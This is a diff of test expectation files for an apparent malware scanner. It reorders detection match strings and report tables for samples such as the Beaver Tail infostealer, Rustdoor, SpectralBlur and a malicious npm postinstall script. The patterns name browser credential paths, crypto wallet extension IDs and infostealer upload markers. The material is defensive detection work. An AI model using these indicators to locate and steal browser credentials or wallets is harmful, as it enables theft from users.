"RiskLevel": "CRITICAL", @@ -95,14 +95,14 @@ { "Description": "Makes references to multiple browser credentials", "MatchStrings": [ - ".config", "Application Support", - "Brave-Browser", - "BraveSoftw", "Chrome/User Data", - "Google/Chrome", "Opera Software", - "Roaming/" + "Brave-Browser", + "Google/Chrome", + "BraveSoftw", + "Roaming/", + ".config" ], "RiskScore": 3, "RiskLevel": "HIGH", @@ -113,19 +113,19 @@ { "Description": "makes HTTPS connections and references multiple Chrome crypto wallet extensions", "MatchStrings": [ - "aeachknmefph", - "bfnaelmomeimh", - "ebolmdjonilk", - "ejbalbakoplch", + "mccdpekplomjjkc", "fhbohimaelbohp", "gpafnldhgmapag", + "bfnaelmomeimh", + "ejbalbakoplch", "hnfanknocfeof", - "http", "ibnejdfjmmkpc", - "mccdpekplomjjkc", "mihkjbmgjidlc", + "ohmabehhmhfoo", + "aeachknmefph", + "ebolmdjonilk", "nkbihfbeogae", - "ohmabehhmhfoo" + "http" ], "RiskScore": 4, "RiskLevel": "CRITICAL", @@ -149,19 +149,19 @@ { "Description": "Beaver Tail Infostealer", "MatchStrings": [ - "%1_%2_%3_%4_%5", - "*.ldb", - "/.pyp/python.exe", - "/client/99", - "/pdown", - "/uploads", "Download Python Success!", "Upload LDB Finshed", "clientDownFinished", - "logkc_db", "name=\"multi_file\"", + "/.pyp/python.exe", + "%1_%2_%3_%4_%5", "pDownFinished", - "upLDBFinished" + "upLDBFinished", + "/client/99", + "/uploads", + "logkc_db", + "/pdown", + "*.ldb" ], "RiskScore": 4, "RiskLevel": "CRITICAL", diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple index 71e0c4f6d..f6e6d08fe 100644 --- a/tests/macOS/2024.Rustdoor/localfile.simple +++ b/tests/macOS/2024.Rustdoor/localfile.simple @@ -79,6 +79,7 @@ persist/daemon: medium persist/launchd/launch_agent: medium privesc/osascript: critical privesc/setuid: low +process/chdir: low process/create: low process/groupid_set: low process/groups_set: low diff --git a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md index b9681c9ed..22bdf343a 100644 --- a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md +++ b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md @@ -3,10 +3,10 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| | HIGH | [anti-static/macho/footer](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/footer.yara#high_entropy_trailer) | [higher-entropy machO trailer (normally NULL) - possible viral infection](https://www.virusbulletin.com/virusbulletin/2013/06/multiplatform-madness) | [_PAGEZERO](https://github.com/search?q=_PAGEZERO&type=code) | -| HIGH | [impact/remote_access/net_term](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_term.yara#spectralblur_alike) | uploads, provides a terminal, runs program | [_uname](https://github.com/search?q=_uname&type=code)
[_unlink](https://github.com/search?q=_unlink&type=code)
[_waitpid](https://github.com/search?q=_waitpid&type=code)
[execve](https://github.com/search?q=execve&type=code)
[shell](https://github.com/search?q=shell&type=code)
[tcsetattr](https://github.com/search?q=tcsetattr&type=code)
[upload](https://github.com/search?q=upload&type=code) | +| HIGH | [impact/remote_access/net_term](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_term.yara#spectralblur_alike) | uploads, provides a terminal, runs program | [tcsetattr](https://github.com/search?q=tcsetattr&type=code)
[_waitpid](https://github.com/search?q=_waitpid&type=code)
[_unlink](https://github.com/search?q=_unlink&type=code)
[_uname](https://github.com/search?q=_uname&type=code)
[execve](https://github.com/search?q=execve&type=code)
[upload](https://github.com/search?q=upload&type=code)
[shell](https://github.com/search?q=shell&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | | MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | -| MEDIUM | [impact/remote_access/pseudo_terminal](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/pseudo_terminal.yara#pty) | [pseudo-terminal access functions](https://man7.org/linux/man-pages/man3/grantpt.3.html) | [grantpt](https://github.com/search?q=grantpt&type=code)
[posix_openpt](https://github.com/search?q=posix_openpt&type=code)
[ptsname](https://github.com/search?q=ptsname&type=code)
[unlockpt](https://github.com/search?q=unlockpt&type=code) | +| MEDIUM | [impact/remote_access/pseudo_terminal](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/pseudo_terminal.yara#pty) | [pseudo-terminal access functions](https://man7.org/linux/man-pages/man3/grantpt.3.html) | [posix_openpt](https://github.com/search?q=posix_openpt&type=code)
[unlockpt](https://github.com/search?q=unlockpt&type=code)
[grantpt](https://github.com/search?q=grantpt&type=code)
[ptsname](https://github.com/search?q=ptsname&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [_proc_download_content](https://github.com/search?q=_proc_download_content&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_addr) | parses IP address | [inet_addr](https://github.com/search?q=inet_addr&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | diff --git a/tests/macOS/clean/ls.json b/tests/macOS/clean/ls.json index 71b5e58ec..fc8534902 100644 --- a/tests/macOS/clean/ls.json +++ b/tests/macOS/clean/ls.json @@ -16,9 +16,9 @@ { "Description": "binary contains hardcoded URL", "MatchStrings": [ - "http://crl.apple.com/codesigning.crl0", "http://www.apple.com/DTDs/PropertyList", "http://www.apple.com/appleca/root.crl0", + "http://crl.apple.com/codesigning.crl0", "https://www.apple.com/appleca/0" ], "RiskScore": 1, diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index 51b2bfdef..e96e084e3 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -14,13 +14,13 @@ | -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[x86](https://github.com/search?q=x86&type=code) | | -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | -LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) | ### 3 consistent behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://crl.apple.com/codesigning.crl0](http://crl.apple.com/codesigning.crl0)
[http://www.apple.com/DTDs/PropertyList](http://www.apple.com/DTDs/PropertyList)
[http://www.apple.com/appleca/root.crl0](http://www.apple.com/appleca/root.crl0)
[https://www.apple.com/appleca/0](https://www.apple.com/appleca/0) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://www.apple.com/DTDs/PropertyList](http://www.apple.com/DTDs/PropertyList)
[http://www.apple.com/appleca/root.crl0](http://www.apple.com/appleca/root.crl0)
[http://crl.apple.com/codesigning.crl0](http://crl.apple.com/codesigning.crl0)
[https://www.apple.com/appleca/0](https://www.apple.com/appleca/0) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | diff --git a/tests/npm/2024.noblox/postinstall.js.json b/tests/npm/2024.noblox/postinstall.js.json index cb4f9ed28..1672b3a93 100644 --- a/tests/npm/2024.noblox/postinstall.js.json +++ b/tests/npm/2024.noblox/postinstall.js.json @@ -15,146 +15,83 @@ "0x10037b", "0x1013c2", "0x1021fa", - "0x1028", - "0x103", "0x104ea0", - "0x1059", - "0x106", "0x107595", "0x107916", - "0x108", - "0x1092", "0x10a213", "0x10a9be", "0x10b3dd", "0x10bda5", - "0x10c", - "0x10d", "0x10e175", - "0x10f", "0x110921", "0x1114d6", "0x112f86", "0x113b46", "0x113df6", - "0x114", "0x115539", "0x1157bd", "0x117ee3", - "0x117f", - "0x118", - "0x119", "0x11aa27", "0x11b77b", - "0x11c", - "0x11d3", "0x11d577", "0x11ee82", "0x11fbb1", - "0x120", "0x121333", "0x121e34", "0x122389", - "0x123", "0x124780", - "0x125", "0x126a5b", "0x127c38", - "0x128", "0x1293ed", "0x12a30d", "0x12a490", "0x12b9ca", "0x12c21f", "0x12c5db", - "0x12d", "0x12e76e", - "0x12f", "0x130a17", - "0x131", "0x132119", "0x132bf6", "0x13313f", - "0x1336", "0x134667", - "0x134f", - "0x135", - "0x136", - "0x137", "0x138021", - "0x139", "0x13a9af", "0x13ae2d", - "0x13b", "0x13c375", "0x13c5f4", "0x13d258", - "0x13e0", - "0x13f", - "0x140", - "0x141", "0x143a28", "0x144413", "0x14507f", "0x145c7d", "0x145e92", "0x146b80", - "0x146f", - "0x147", - "0x148", "0x14912a", "0x149296", "0x1498b9", - "0x14a", - "0x14b", "0x14c6eb", "0x14cb59", - "0x14d", - "0x14e", "0x14f70e", - "0x150", - "0x151", "0x152267", "0x15296b", "0x152dce", - "0x153", - "0x154", - "0x155", "0x156c33", - "0x1575", - "0x1587", - "0x159", "0x15aaf1", - "0x15b", "0x15c0f7", "0x15c412", - "0x15d1", "0x15e2f0", - "0x15f", "0x160880", "0x160e56", - "0x161c", - "0x162", "0x163b6e", - "0x164", "0x1656be", "0x1669ef", - "0x167", - "0x168", - "0x169", - "0x16a", - "0x16b", "0x16c7cd", "0x16d3c3", "0x16e396", "0x16e6f2", - "0x16f9", "0x17026b", "0x17140a", - "0x172", "0x173075", - "0x174", - "0x177", "0x17868f", "0x1788d6", "0x17909a", @@ -162,16 +99,8 @@ "0x17993d", "0x17abdd", "0x17b582", - "0x17c", - "0x17d", - "0x17e", - "0x17f", "0x180c91", - "0x181", - "0x182", - "0x183", "0x18467d", - "0x185", "0x186de6", "0x187f23", "0x188747", @@ -180,56 +109,36 @@ "0x18a89e", "0x18aa11", "0x18ab75", - "0x18b", - "0x18c", "0x18d9af", - "0x18e", - "0x18f", "0x19043b", "0x191854", "0x192372", "0x1927e0", - "0x193", "0x194616", "0x194c9c", - "0x195", - "0x196", "0x197179", "0x1979f7", "0x198326", "0x198c7f", - "0x199", "0x19ac44", - "0x19b", - "0x19c", "0x19d7a8", - "0x19e", "0x19fbc7", "0x1a06ca", "0x1a1942", "0x1a196e", - "0x1a2", "0x1a3088", "0x1a3f31", "0x1a42d0", - "0x1a5", "0x1a6c2d", "0x1a7645", "0x1a7962", - "0x1a8", "0x1a96c3", "0x1aa1e3", - "0x1ab", "0x1ac2c5", - "0x1ad", - "0x1ae", "0x1af4cc", - "0x1b0", "0x1b1092", "0x1b2231", "0x1b29ee", - "0x1b36", - "0x1b4c", "0x1b556c", "0x1b5da8", "0x1b5dce", @@ -242,87 +151,51 @@ "0x1ba650", "0x1bab2d", "0x1bba3d", - "0x1bc", - "0x1bd", - "0x1be", "0x1bfdb5", - "0x1c0", - "0x1c1", "0x1c27cf", "0x1c2aad", - "0x1c3", - "0x1c4", "0x1c5ace", - "0x1c6", - "0x1c7", "0x1c8f57", - "0x1c9", "0x1ca4b7", - "0x1ca5", - "0x1caa", "0x1ccd7a", "0x1cce8d", "0x1cd058", "0x1cebca", "0x1cedfb", - "0x1cf", - "0x1d0", - "0x1d1", - "0x1d2", "0x1d3584", "0x1d4eab", - "0x1d5", "0x1d6007", "0x1d73e1", "0x1d7c1b", - "0x1d8", "0x1d9e46", "0x1da289", "0x1dbe1c", "0x1dcce9", - "0x1dd", - "0x1de", - "0x1df", - "0x1e0", "0x1e1af1", "0x1e3e00", "0x1e468c", - "0x1e5", "0x1e68c1", "0x1e7534", - "0x1e8", "0x1e93a7", "0x1e9a5f", - "0x1ea", "0x1ebf4c", "0x1ec8a2", - "0x1ed", "0x1ee8b0", - "0x1ef", "0x1f0545", "0x1f077a", "0x1f1ca8", "0x1f269b", "0x1f2733", "0x1f2eb3", - "0x1f3", "0x1f4e28", - "0x1f5", - "0x1f6", "0x1f72f8", - "0x1f8", "0x1f9754", "0x1f9a71", "0x1f9bad", "0x1f9c61", - "0x1fa", - "0x1fb", - "0x1fc", "0x1fd335", "0x1fd8a8", - "0x1fe", "0x1ff075", - "0x200", "0x201fd5", "0x202119", "0x2036d8", @@ -332,46 +205,27 @@ "0x20665f", "0x206a11", "0x207529", - "0x208", - "0x209", "0x20a6c1", "0x20ab1a", "0x20abc1", "0x20bf67", "0x20cd04", - "0x20d", "0x20e021", "0x20ecba", - "0x20f", - "0x211", - "0x212", - "0x213", "0x2149a5", "0x214c21", - "0x215", "0x2160f4", "0x2163c2", "0x216c72", - "0x217", - "0x218", "0x219fe0", - "0x21a", - "0x21b", - "0x21c", "0x21d86c", "0x21e4ca", "0x21f95b", "0x2206d6", - "0x220d", - "0x221", "0x222417", "0x223815", "0x223adf", - "0x224", "0x2253de", - "0x226", - "0x227", - "0x2286", "0x229f95", "0x22b921", "0x22be5d", @@ -380,14 +234,12 @@ "0x22f43f", "0x23099c", "0x231f5f", - "0x232", "0x2338ff", "0x23456c", "0x2348aa", "0x235828", "0x236ddd", "0x2373ca", - "0x2380", "0x238f84", "0x239fe1", "0x23ac56", @@ -395,16 +247,8 @@ "0x23bc7c", "0x23c7a6", "0x23d2e0", - "0x23e", "0x23fde0", - "0x2409", - "0x241", - "0x242", - "0x243", "0x244ef7", - "0x245", - "0x246", - "0x247", "0x248b0a", "0x2492c8", "0x2493a4", @@ -412,13 +256,8 @@ "0x24b031", "0x24c584", "0x24c856", - "0x24d", - "0x24e", "0x24f952", - "0x250", - "0x251", "0x253694", - "0x2538", "0x254502", "0x2558ea", "0x256605", @@ -426,11 +265,9 @@ "0x256d7f", "0x256db8", "0x256de2", - "0x257", "0x258456", "0x2594bf", "0x259e7b", - "0x25a", "0x25b07a", "0x25c3b3", "0x25c5bf", @@ -438,20 +275,14 @@ "0x25e5ea", "0x25ea14", "0x25f2ae", - "0x260e", "0x260f92", - "0x261", "0x26278a", "0x26338a", "0x263b94", - "0x264", "0x2655fb", "0x2657e7", - "0x267", - "0x268", "0x26947d", "0x269e02", - "0x26a", "0x26b0be", "0x26b132", "0x26b6c1", @@ -459,74 +290,50 @@ "0x26c110", "0x26cfc4", "0x26d8ca", - "0x26e", - "0x26f2", - "0x270", "0x271a35", "0x271a3a", "0x272826", - "0x273", "0x274209", "0x275415", "0x2755c2", "0x276fac", "0x2775f9", - "0x278", "0x2790f0", "0x2791ce", "0x27a2cc", "0x27aefd", - "0x27b", - "0x27c", "0x27da22", "0x27da5b", "0x27ecf7", "0x27f2c0", "0x27f678", "0x280a6d", - "0x281", - "0x282", - "0x283", "0x284232", "0x2844b5", "0x2844f2", "0x28547e", - "0x286", "0x288151", "0x28833d", "0x288f7e", - "0x289", - "0x28a", - "0x28b", "0x28c27a", "0x28dfbf", - "0x28e", "0x28f8f2", "0x291082", "0x29253d", - "0x293", - "0x294", "0x295082", "0x296d9d", - "0x297", - "0x298", "0x2999e2", "0x29a103", "0x29a110", - "0x29b", "0x29ddf0", "0x29df49", "0x29ef97", - "0x29f", "0x2a0ec4", - "0x2a1", "0x2a202b", "0x2a21ec", "0x2a3683", - "0x2a4", "0x2a5345", "0x2a66ec", - "0x2a77", "0x2a8d6f", "0x2a9260", "0x2a9d82", @@ -535,12 +342,8 @@ "0x2aa7d9", "0x2aad1a", "0x2aaf25", - "0x2ab", "0x2ace3c", - "0x2ad", - "0x2ae", "0x2af0b2", - "0x2b0", "0x2b123d", "0x2b151c", "0x2b1592", @@ -548,37 +351,23 @@ "0x2b307e", "0x2b3102", "0x2b3b0f", - "0x2b4", "0x2b67f1", "0x2b7890", - "0x2b8", - "0x2b9", - "0x2ba", "0x2bb28a", "0x2bbfe4", "0x2bc157", "0x2bc28b", - "0x2bd", - "0x2be", "0x2bf62e", "0x2c0c26", - "0x2c1", - "0x2c2", - "0x2c43", "0x2c4c0c", - "0x2c5", "0x2c63cf", "0x2c721d", "0x2c7a41", "0x2c81e6", "0x2c847c", - "0x2c9", "0x2ca603", - "0x2cb", - "0x2cc", "0x2cd990", "0x2ce080", - "0x2cf", "0x2d0c83", "0x2d0da2", "0x2d127a", @@ -586,44 +375,30 @@ "0x2d251a", "0x2d3b2d", "0x2d3fb7", - "0x2d4", "0x2d54d0", "0x2d557b", "0x2d6319", "0x2d7d71", "0x2d892b", "0x2d98a9", - "0x2da", "0x2db5e8", "0x2db659", "0x2dbc2d", "0x2dc72f", "0x2dcdd3", - "0x2dd", - "0x2de", - "0x2df", - "0x2e0e", "0x2e177d", "0x2e2554", "0x2e2f68", "0x2e3fcf", - "0x2e4", "0x2e5108", "0x2e60ae", "0x2e71ac", - "0x2e8", - "0x2e9", "0x2eaf2e", "0x2ebb46", - "0x2ec", - "0x2ed", "0x2ee14b", "0x2ee8f4", - "0x2ef0", "0x2ef580", - "0x2f0", "0x2f18df", - "0x2f2", "0x2f3509", "0x2f4e64", "0x2f5347", @@ -640,58 +415,33 @@ "0x2fdf2e", "0x2fe437", "0x2fecbf", - "0x300", "0x301867", - "0x302", - "0x303", "0x30416e", "0x30419f", "0x305096", "0x305782", - "0x306", - "0x308", - "0x309", "0x30a458", "0x30a768", "0x30a861", "0x30af49", - "0x30b", "0x30c5b6", - "0x30cf", "0x30d8af", - "0x30e", "0x30fcc8", - "0x310", - "0x311", - "0x312", "0x313b35", "0x3143c7", "0x31458e", "0x314bad", - "0x315", "0x316a65", "0x31702a", - "0x318", - "0x319", - "0x31a", - "0x31b", - "0x31c", - "0x31d", "0x31e226", "0x31e234", "0x31e86e", "0x31ea18", "0x31f4ae", - "0x320", "0x321e30", - "0x322", - "0x324", - "0x325", "0x326d8c", - "0x327", "0x3280aa", "0x3288b8", - "0x329", "0x32a1b3", "0x32b483", "0x32c5fd", @@ -702,14 +452,11 @@ "0x3301ef", "0x330d92", "0x330dc3", - "0x331", "0x3320a9", "0x332cae", "0x332f07", "0x333a8a", "0x3342e8", - "0x335", - "0x336", "0x337370", "0x3381ce", "0x338202", @@ -717,19 +464,15 @@ "0x33ab52", "0x33b4e1", "0x33bc6a", - "0x33c", "0x33d1cd", "0x33db96", "0x33dc44", - "0x33f", "0x34085b", "0x341499", "0x342223", "0x342372", "0x34277b", "0x342f3c", - "0x343", - "0x344", "0x345b05", "0x346e8b", "0x347b88", @@ -752,44 +495,25 @@ "0x352236", "0x352580", "0x352edf", - "0x353", - "0x354", "0x3557d9", "0x355ae3", "0x355cfa", - "0x356", "0x357f86", - "0x358", - "0x359", - "0x35a", "0x35b919", "0x35c8d4", - "0x35d", "0x35e0e4", "0x35e223", "0x35f27f", - "0x360", - "0x361", "0x362010", "0x3622ef", "0x362842", "0x3628b8", "0x362c15", - "0x363", "0x364074", "0x364c14", - "0x365", "0x3662eb", - "0x367", - "0x368", "0x36933f", - "0x36a", - "0x36b", - "0x36c", - "0x36d", - "0x36e", "0x36f82b", - "0x370", "0x3718ec", "0x372e1c", "0x3737f2", @@ -797,7 +521,6 @@ "0x37510b", "0x3756d6", "0x375e71", - "0x376", "0x37799c", "0x37899c", "0x379401", @@ -806,75 +529,43 @@ "0x37b77f", "0x37cbb5", "0x37e1dd", - "0x37f", "0x3809f8", "0x3811c2", "0x381d2a", "0x381f2a", - "0x382", - "0x383", - "0x384", "0x3866ca", - "0x387", "0x38918e", "0x38b6a2", "0x38bd9a", - "0x38c", "0x38dfae", - "0x38e", - "0x38f0", "0x38fcff", - "0x390", - "0x391", "0x392ca6", - "0x393", "0x39407d", "0x395472", "0x395585", "0x395dd5", "0x396f6e", - "0x397", - "0x398", "0x399d2f", "0x39a03e", - "0x39b", - "0x39c", - "0x39d", - "0x39e", - "0x39f", - "0x3a0", - "0x3a1", - "0x3a2", "0x3a38fe", - "0x3a3d4", "0x3a425d", - "0x3a5", "0x3a65bb", - "0x3a8", "0x3a90bc", "0x3a9137", "0x3a947c", "0x3a948a", - "0x3aa", "0x3ab5d4", "0x3abe51", - "0x3ac", "0x3ad725", "0x3af9b1", - "0x3b0", "0x3b13f0", "0x3b187b", "0x3b3216", - "0x3b4", "0x3b549c", - "0x3b6", - "0x3b7", "0x3b8650", "0x3b89e8", - "0x3b9", "0x3ba53b", "0x3bba06", - "0x3bc", "0x3bd231", "0x3be3ce", "0x3bf94c", @@ -882,12 +573,10 @@ "0x3c0cda", "0x3c1a7d", "0x3c1d59", - "0x3c2", "0x3c32d8", "0x3c3e30", "0x3c471e", "0x3c4a8d", - "0x3c5", "0x3c6cbe", "0x3c7942", "0x3c83ca", @@ -896,62 +585,43 @@ "0x3cbcc8", "0x3cc7d9", "0x3ccbb8", - "0x3cd", - "0x3ce", "0x3cf81b", - "0x3d0", "0x3d15bf", "0x3d16c4", "0x3d28e7", "0x3d2a44", - "0x3d3", "0x3d4fea", - "0x3d6", - "0x3d7", "0x3d804a", "0x3d8546", "0x3d8ad7", "0x3d8dbb", "0x3d8ed9", - "0x3d9", "0x3db26e", - "0x3dc", "0x3ddbf2", "0x3de5f8", "0x3dfaf7", "0x3dfd39", - "0x3e1", "0x3e2999", "0x3e2b22", - "0x3e3", "0x3e49c1", - "0x3e5", - "0x3e6", "0x3e85fd", "0x3eacab", "0x3eb60d", "0x3ebab3", "0x3ebdd9", - "0x3ec", "0x3ed9a2", "0x3edc70", - "0x3ee", "0x3ef622", "0x3efa5d", "0x3f0172", "0x3f0fb7", - "0x3f1", - "0x3f2", - "0x3f3", "0x3f4178", - "0x3f5", "0x3f666a", "0x3f760d", "0x3f8597", "0x3f9cc7", "0x3fa1bc", "0x3fb793", - "0x3fd", "0x3fee17", "0x400c4d", "0x401263", @@ -959,34 +629,22 @@ "0x402549", "0x402659", "0x402ce0", - "0x403", "0x40558d", "0x405653", - "0x406", - "0x407", "0x408049", "0x409445", "0x409b5c", - "0x40a", "0x40b850", - "0x40c", - "0x40d", "0x40e429", "0x40ebcb", "0x40fbfb", - "0x410", "0x411a7a", - "0x412", "0x4137f8", "0x413ef9", - "0x414", - "0x415", "0x416b4f", - "0x418", "0x41bf8f", "0x41ccd1", "0x41cd54", - "0x41f", "0x4205f0", "0x420aaf", "0x421a86", @@ -994,29 +652,18 @@ "0x424cd2", "0x425315", "0x42650c", - "0x427", - "0x428", - "0x42a", "0x42b3b1", "0x42be7c", "0x42c8f2", - "0x42d", "0x42e0ab", "0x42e627", - "0x42f", - "0x430", "0x4313b0", "0x433004", "0x433985", - "0x434", - "0x435", "0x4360ad", "0x4367ff", - "0x437", "0x439e71", - "0x43a", "0x43b0f4", - "0x43c", "0x43dae9", "0x43e221", "0x43e563", @@ -1032,18 +679,15 @@ "0x444d26", "0x44585e", "0x445d40", - "0x446", "0x447ce7", "0x448919", "0x44892b", "0x448978", "0x44957f", "0x44a183", - "0x44b", "0x44cf67", "0x44cff2", "0x44d5b3", - "0x44e", "0x44f6ce", "0x44fa48", "0x45104a", @@ -1053,25 +697,16 @@ "0x454078", "0x454534", "0x45507d", - "0x456", - "0x458", "0x459b55", - "0x45a", - "0x45b", "0x45c2d1", "0x45c7bb", "0x45d537", "0x45ed10", - "0x45f", - "0x460", "0x4613c2", - "0x462", "0x46354a", "0x465884", "0x465b36", "0x465d37", - "0x466", - "0x467", "0x46844b", "0x46a1e8", "0x46a69c", @@ -1080,21 +715,14 @@ "0x46da07", "0x46dacc", "0x46de06", - "0x46e", - "0x46f", - "0x470", "0x47164f", "0x47284b", "0x472b4c", "0x473467", - "0x474", - "0x4752a", "0x4753fa", "0x4753ff", "0x47589b", "0x47643a", - "0x477", - "0x478", "0x4790d1", "0x4797c3", "0x47a2aa", @@ -1105,11 +733,8 @@ "0x47f4f3", "0x4801d3", "0x480e3f", - "0x481", "0x483f8c", - "0x484", "0x4853df", - "0x486", "0x487164", "0x4873ae", "0x487d3e", @@ -1117,81 +742,48 @@ "0x489836", "0x489c5b", "0x48a670", - "0x48b", "0x48c251", "0x48d3cb", "0x48dc82", - "0x48e", - "0x48f", "0x490295", "0x491f3b", "0x492860", - "0x493", "0x4940e4", - "0x495", "0x497494", - "0x498", - "0x499", "0x49a12e", "0x49a753", "0x49a96a", - "0x49b", - "0x49c", "0x49d40a", "0x49d9c1", - "0x49e", - "0x49f", "0x4a037f", - "0x4a1", "0x4a2909", "0x4a30a9", "0x4a3255", - "0x4a4", - "0x4a5", - "0x4a6", - "0x4a7", - "0x4a8", "0x4a9cb4", "0x4aa6e8", "0x4aaca6", "0x4abb73", "0x4ac189", "0x4ad2a1", - "0x4ae", "0x4af744", "0x4b003a", - "0x4b1", - "0x4b2", - "0x4b3", - "0x4b4", - "0x4b5", "0x4b6c36", "0x4b7479", - "0x4b8", "0x4b9420", - "0x4ba", "0x4bbe58", "0x4bc829", - "0x4bd", "0x4be820", "0x4bf6f4", "0x4c0380", "0x4c0bb7", "0x4c190c", "0x4c1e22", - "0x4c2", - "0x4c3", "0x4c43d2", - "0x4c5", - "0x4c6", - "0x4c7", - "0x4c8", "0x4c94bc", "0x4c9c26", "0x4ca44f", "0x4cbaa4", "0x4cbc24", - "0x4cc", "0x4cd3af", "0x4ce0a2", "0x4cfe7b", @@ -1199,72 +791,49 @@ "0x4d2833", "0x4d2ca4", "0x4d37e0", - "0x4d4", "0x4d5897", - "0x4d6", - "0x4d7", "0x4d800c", "0x4d9fff", "0x4dac6e", "0x4dcfd5", "0x4dd3cb", - "0x4de", "0x4df61f", - "0x4e0", "0x4e1d18", "0x4e26dc", "0x4e2dd5", "0x4e3376", - "0x4e4", "0x4e585a", - "0x4e6", - "0x4e7", "0x4e8b2a", - "0x4e9", - "0x4ea", - "0x4eb", - "0x4ec", "0x4ed456", "0x4ee031", "0x4eed44", - "0x4ef", - "0x4f0", "0x4f1b26", "0x4f36b5", "0x4f4ea3", "0x4f512e", "0x4f5957", - "0x4f6", "0x4f7d0f", "0x4f83f4", "0x4f867a", - "0x4f9", "0x4fa14e", "0x4fbf3d", - "0x4fc", "0x4fd04e", "0x4fea52", - "0x4ff", "0x5023d8", "0x503508", "0x505421", "0x505a52", - "0x506", - "0x507", "0x508cb1", "0x509110", "0x509cdf", "0x509f68", "0x50a1bf", "0x50a9e7", - "0x50c", "0x50d1a4", "0x50d6c9", "0x50eb04", "0x50ec8f", "0x50f8bc", - "0x510", - "0x511", "0x512638", "0x513635", "0x514264", @@ -1274,20 +843,13 @@ "0x51953b", "0x51a688", "0x51b5e4", - "0x51c", - "0x51d", "0x51ec00", - "0x51f", - "0x520", "0x521764", "0x522004", "0x522270", - "0x523", - "0x524", "0x5255e9", "0x526fa7", "0x52796a", - "0x528", "0x52901a", "0x529289", "0x52a931", @@ -1296,37 +858,29 @@ "0x52b717", "0x52b932", "0x52c340", - "0x52d", "0x52e7e7", "0x52f0ab", - "0x530", "0x5310d0", "0x531a64", "0x532394", "0x533243", - "0x534", "0x53528d", - "0x536", "0x537bde", "0x537fab", "0x5382eb", "0x5387f0", "0x538a03", "0x538a18", - "0x53914", "0x53a82b", "0x53ab67", "0x53bc75", "0x53d759", - "0x53e", "0x54028f", "0x541bc3", - "0x542", "0x5435a3", "0x543667", "0x543740", "0x544066", - "0x545", "0x5462cb", "0x546403", "0x547437", @@ -1334,46 +888,34 @@ "0x54af09", "0x54b939", "0x54baca", - "0x54c", "0x54d4d7", "0x54d929", "0x54db24", - "0x54e", "0x54f6d9", "0x550f8d", "0x5517f7", "0x551806", - "0x552", - "0x554", "0x55543b", "0x555e3b", "0x556ce8", - "0x557", - "0x558", 